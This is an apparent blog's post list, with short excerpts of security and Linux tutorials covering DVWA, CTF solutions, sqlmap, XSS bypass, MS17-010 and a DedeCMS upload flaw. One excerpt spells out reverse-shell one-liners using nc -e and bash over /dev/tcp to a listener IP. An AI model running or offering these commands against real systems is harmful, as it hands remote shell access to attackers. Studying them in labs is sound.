- 博客(23)
- 收藏
- 关注
原创 Ubuntu 图形化界面登录,报错 sorry,that didn‘t work.please try again
Ubuntu 图形化界面登录,报错 sorry,that didn’t work.please try again今天刚装完ubuntu20.04,设置好root密码后发现 root 用户登录会报这样的错误:Sorry,that didn’t work.please try again.实际上命令行登录是没有问题的,说明并不是密码的原因,基本就是桌面环境的原因啦。vi /etc/pam.d/gdm-autologin#注释 "auth requied pam_succeed_if.so user
2021-06-02 20:40:54 5003 2
原创 Ubuntu20.04系统Cuckoo sandbox所需环境搭建及安装(超详细图文)
请勿叫我大神,我只是互联网的搬运工~前言本教程以Ubuntu20桌面版作为示范,服务器版同样适用,但可能稍微麻烦一点,服务器版本的话安装Xmanage套装使用可能会相对轻松一些,由于后面会使用到vbox的使用,对vbox命令行操作不熟悉的小伙伴用xmanage可能会相对轻松一点。提示:以下是本篇文章正文内容,下面案例可供参考安装ubuntu20桌面版步骤1:转到https://ubuntu.com/download/desktop下载下载.iso。步骤2:使用您选择的虚拟机监控程序(VMWa
2021-05-24 00:12:58 9669 26
原创 用一台阿里云服务器实现frp内网穿透
前言这段时间实验室的一台内网主机上的代码需要经常进行调试,工作日还好,能直接在机器上改代码,一到周末在家的我,发现主机的程序发生异常就束手无策了,用VPN又觉得太麻烦了,突然想起利用frp的反向代理能来帮我实现内网穿透,只要有一个外网主机,在家也能实现对内网主机的操作啦。提示:以下是本篇文章正文内容,下面案例可供参考一、环境介绍一台拥有公网IP的主机(小R买了一台阿里云的服务器,操作系统为ubuntu20.04。IP:139.196.xx.xx/)一台内网的主机(操作系统:ubuntu18.0
2021-04-05 20:32:24 1040
原创 sysmon安装报错“error getting the evt dll (wevtapi.dll): 87”解决办法
前言今天想安装sysmon来对windows系统日志进行安全研究的时候,发现本机(WIN10)成功安装了,但是在靶机win7和win2008上安装时都出现了同样的错误信息:“error getting the evt dll (wevtapi.dll): 87”。以下是解决安装问题的方法。一、安装补丁一开始以为是系统环境缺少了“wevtapi.dll”这个文件,但是在系统文件中发现并不缺少,即使从网上下别的版本进行注册,问题依旧存在,应该不是缺少文件的问题了,最后才知道是由于没打系统补丁导致的安装失败
2021-01-24 22:56:56 1529
原创 python写一个incaseformat检测工具
一、incaseformat1.13日爆发的incaseformat病毒会在对应的系统时间触发攻击行为,能在短时间内删除除了系统盘之外的所有文件。据研究人员称该病毒会在1.23再次爆发,小R根据该病毒生成特点制作了一个简单的检测工具。编程环境:python3.7二、代码from tkinter import *import os.pathwin=Tk()win.title('Incaseformat_chacker')win.geometry('450x50')L = Label()t
2021-01-16 15:13:18 383 3
原创 Linux多姿势反弹shell
前言以下反弹shell的各种方法是小R收集到的,部分没有复现成功的方法没有放上来,待复现成功后会慢慢把文章完善,如有错误请帮忙指出。1.Nc -e反弹攻击端:nc -lvp 23333受害端:nc -e /bin/bash 192.168.154.129 233332.Bash -i反弹攻击端:nc -lvp 23333受害端:bash -i >/dev/tcp/192.168.154.129/23333 0>&1 2>&1(b
2020-12-26 14:08:08 1357
原创 ctfshow-web5
靶场地址:ctf.show1.读代码v1:参数要求为字母。v2:参数要求为数字。当v1和v2的MD5相同时,打印出flag的值。2.md5碰撞不同数据的md5是不会相等的,但是这边用的是==,如果得出的md5值是"0e"+"数字" 的格式,就会被当作科学计数法,值都为0。举例:只要找到对应格式的MD5值的全字母和全数字的值就可以了。我用python写了一个自动化程序找出对应格式的md5值,只要修改对应的payload就可以了。好家伙,这几率和买彩票一样,对应全数字和全字母一共跑了几个
2020-12-20 14:40:01 621
原创 PHP安全:简谈文件包含漏洞
简谈文件包含漏洞前言0x01 危险的函数0x02 四种函数的区别0x03 本地文件包含和远程文件包含0x04 练练手吧总结前言文件包含,算是“注入攻击”中的典型代表之一了,这种漏洞在PHP语言上出现比较多,因为PHP语言在设计上一开始没有过多地考虑安全性,时至今日,尽管PHP社区和开发者一直在安全性上做出努力,不过遗留下来的问题还是不少。本篇主要讲解PHP文件包含漏洞的相关知识。(替兄弟默哀三分钟= =、)0x01 危险的函数文件包含可能出现在JSP、PHP、ASP等语言中,常见的导致文
2020-12-18 18:06:15 729
原创 DVWA靶机通关系列--3.CSRF(跨站点请求伪造)(解题思路+审计分析)
DVWA靶机通关系列--3.CSRF(跨站点请求伪造)(解题思路+审计分析)前言0x01 CSRF(跨站点请求伪造)CLASS LOWCLASS:MEDIUMCLASS:HIGH总结前言这时肯定有小伙伴要说了,“哎呀你怎么第二关的命令注入还没讲就直接讲第三关了???小R你不讲5的,我劝你耗子尾汁……”开个玩笑,因为最近面试经常被问到关于CSRF的问题,也重新对该部分的理论基础复习了一下,想着趁热打铁,先写这一部分,这样写的过程思路也可能会相对清晰一点,下一篇一定写第二关= =(狗头保命)。B
2020-12-14 19:32:04 567
原创 sqlmap学习笔记:常用命令
文章目录前言0x01 使用环境0x02 判断注入点0x03 常用命令1.查询当前数据库2.查询所有数据库3.爆表名4.爆字段名5.脱库6.获取数据库用户密码(加爆破)0x04 总结前言sqlmap可以说是sql自动化注入工具的不二之选了,通常sql注入的过程中,也没有人绝对地只用手注或者自动化注入,通常是根据实际情况两者配合使用,这篇文章以POST类型注入为例子,示范sqlmap常用命令的使用方法。0x01 使用环境测试网页:sqli-labs的第11关。操作系统:kali(由于win环境
2020-12-08 17:58:50 1088
原创 细谈渗透测试的前期工作——信息收集
细谈渗透测试的前期工作——信息收集前言0x01 收集什么信息0x02 作用和收集方法总结前言都说学安全的,查资料找信息什么的都是基本功,收集信息的能力都是杠杠的,经常网上有什么热门的事情,小伙伴们都会来找我帮他们找点瓜吃,也常常让我帮忙找特定的一些岛国教育资料,真是工具人实锤了。。咳咳扯远了,扯远了。所谓知己知彼,百战不殆,要做好渗透测试,前期的信息收集工作可以说是非常重要了,在面试中这也是高频出现的问题,可能感觉很简单,但是其中还是有很多不可忽略的小细节,往往就是这些小细节决定能否成功渗透的一个
2020-12-02 16:31:26 728
原创 DVWA靶机通关系列--1.Brute Force(暴力破解)(解题思路+审计分析)
DVWA靶机通关系列--1.Brute Force(暴力破解)(解题思路+审计分析)前言0x01 Brute Force(暴力破解)CLASS:LOWCLASS:MEDIUMCLASS:HIGHCLASS:IMPOSSIBLE前言最近在复习一些基础的常见web漏洞,经典的靶机大家肯定最先想到的就是DVWA了,我用的是1.10版本,目前里面的题型包括了14个专题板块,题目难度也分为低(low)中(medium)高(high)和不可能(impossible)几个等级。Brute Force(暴力破解
2020-11-29 01:08:12 978
原创 CentOS7 利用rsyslog建立日志备份(同步)服务
CentOS7 利用rsyslog建立日志备份(同步)服务前言0x01 服务端配置0x02 客户端配置0x03 测试0x04 总结前言日志是查看系统运行情况的一个重要部分,在应急响应中,服务器的日志文件就扮演了一个特别重要的作用,管理员根据日志可以判断一些恶意的攻击行为,以此来将一些IP拉入黑名单或者对攻击进行溯源等等。为防止日志被恶意删除的行为,日志的备份就显得特别重要。0x01 服务端配置服务端:负责接收其他客户端发来的日志,并做好备份保存。打开rsyslog的配置文件。vim /et
2020-11-26 00:49:44 2959 6
原创 CSZ CMS 1.2.7 用户私信XSS漏洞复现+审计+修复建议
CSZ CMS 1.2.7 用户私信XSS漏洞复现+审计+修复建议前言0x01 环境准备二、使用步骤1.引入库2.读入数据总结前言CSZ 是外国的一个开源的CMS,使用PHP作为后端语言,MYSQL或MariaDB(MySQL的一个分支数据库,两者的历史感兴趣的可以去看一下。知乎:Mariadb和mysql是什么关系?)。普通用户可以通过此漏洞,在发送私信功能中向管理员的管理页面植入前端脚本。0x01 环境准备示例:pandas 是基于NumPy 的一种工具,该工具是为了解决数据分析任务而创建
2020-11-23 22:36:46 1016
原创 PhpStudy使用中出现You don‘t have permission to access / on this server.解决办法
前言今天下了一个开源的建站文件,想用来测试一下。和往常一样,把文件放到根目录下之后,出现了FORBIDDEN报错,一开始挺纳闷的,其他目录都能正常访问怎么到你这就不行了,也不可能是权限问题啊。最后才发现是没打开允许目录列表这个设置的关系。1.出现的错误页面。2.在设置中勾选允许目录列表3.再次访问,能正常显示。总结其实最后我还是不能理解,文件目录下是有index.php文件的,为什么非要打开允许目录列表才能访问,毕竟这个选项在实际运用中是不建议打开的,希望有建站的行家来帮助解惑。ORZ
2020-11-23 13:22:49 5128 2
原创 MS17-010(Eternal blue永恒之蓝)漏洞利用+修复方法
MS17-010(Eternal blue永恒之蓝)漏洞利用+修复方法前言0x01 准备工作0x02 漏洞利用0x03 修复方案总结前言提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝(MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生。该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的危险漏洞“EternalBlue”(永恒之蓝)进行传播 。勒索病毒肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。最新统计数据显示,
2020-11-22 14:31:45 86145 19
原创 SQL注入-常用函数和语句
文章目录前言0x01 常用函数0x02 常用语句总结前言SQL的函数很多,这里简单介绍一下在SQL注入中比较常用到的一些函数,如果你SQL学的不是很好,又想练一练SQL手工注入的话,可以优先学习这些函数和语句。0x01 常用函数system_user() 系统用户名concat_ws()含有分隔符的链接字符串user() 用户名group_concat() 连接所有字符串并逗号分割database() 数据库名into outfile()写文件(有.
2020-11-21 22:57:55 932
原创 DedeCMS V5.7 SP2前台文件上传漏洞复现+审计+修复建议
DedeCMS V5.7 SP2前台文件上传漏洞复现+审计+修复建议前言0x01 环境搭建0x02 复现过程重点开始0x03 源码审计0x04 修复建议前言CVE-2018-201292018-12-11 在CVE中文申请站公布了一个 DEDECMS 5.7 SP2 最新版本中存在文件上传漏洞,具有管理员权限者可利用该漏洞上传并getshell执行任意PHP代码。经过分析验证。该漏洞要求管理员权限登录。并且要开启会员功能,这个功能在默认情况下是不开启,需要管理员手动开启。经过360CERT判断
2020-11-21 02:09:44 2942
原创 XSS(跨站脚本攻击)多姿势绕过滤思路
XXS(跨站脚本攻击)多姿势绕过滤思路0x01 什么是XSS?0x02 XSS的危害0x03 XSS类型0x04 多姿势绕过1.基本的xss2.大小写绕过、字符拼接3.解锁更多姿势4.转义字符的排除0x05 其他情况0x06 总结0x01 什么是XSS?恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页面时,嵌入Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。XSS攻击主要针对的是客户端的攻击。0x02 XSS的危害XSS能实现的的攻击有很多,一般攻击水平是取决
2020-11-17 21:25:53 1279
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人